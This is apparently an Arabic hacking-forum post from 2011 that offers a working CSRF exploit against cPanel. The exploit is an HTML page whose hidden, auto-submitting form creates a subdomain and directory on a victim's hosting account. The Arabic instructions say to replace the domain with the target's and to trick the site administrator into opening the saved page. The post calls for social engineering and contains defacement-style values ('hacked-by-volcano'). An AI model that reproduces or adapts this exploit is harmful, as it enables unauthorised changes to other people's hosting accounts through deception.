كود PHP:
### Exploit Title: Cpanel [CSRF] Add Sub domain########
# Author: kalashnikov
# Software Link: http://www.cpanel.net/
###############/Exploit\###############################
<html>
<body onload="********.csrf.submit();">
<form name="csrf" method="POST" name="form0" action="http://vbspiders.com:2082/frontend/x3/subdomain/doadddomain.html">
<input type="hidden" name="domain" value="hacked-by-volcano" /> . <input type="hidden" name="rootdomain" value="vbspiders.com" />
<input type="hidden" name="dir" value="public_html/VoLc4n0" />
<input type="hidden" name="go" value="public_html/VoLc4n0/hacked" />
</html>
######################################################
Home :- VbSpIdErS.CoM ~ VoLc4n0 ~ FLa$h ~ StOnE LoVe //\\ KaLa$nikoV t34m //\\
Greetz :- FK Mr.NoHa
######################################################
الثغره عاديه ومش خطيره
وتحتاج لهدنسه اجتماعيه كويسه :D
شرح ......
احفظ الثغره بامتداد html
غير اسم الدومين vbspiders.com الى الدومين الهدف
غير هذا الى ما تريد hacked-by-volcano
غير هذا الى ما تريد public_html/VoLc4n0
غير هذا الى ما تريد public_html/VoLc4n0/hacked
حسب الاعدادات اعلى سيتم انشاء هذا الدومين
hacked-by-volcano.vbspiders.com
وبداخله مجلد باسم
hacked
الاستغلال تقوم بحفظ الصفحه بامتداد html وارسالها الى اداري االموقع .....
بالتوفيق
Cpanel FCSRFD Add Sub domain
01-06-2011, 08:06 PM
Cpanel [CSRF] Add Sub domain 
العرض الشجري
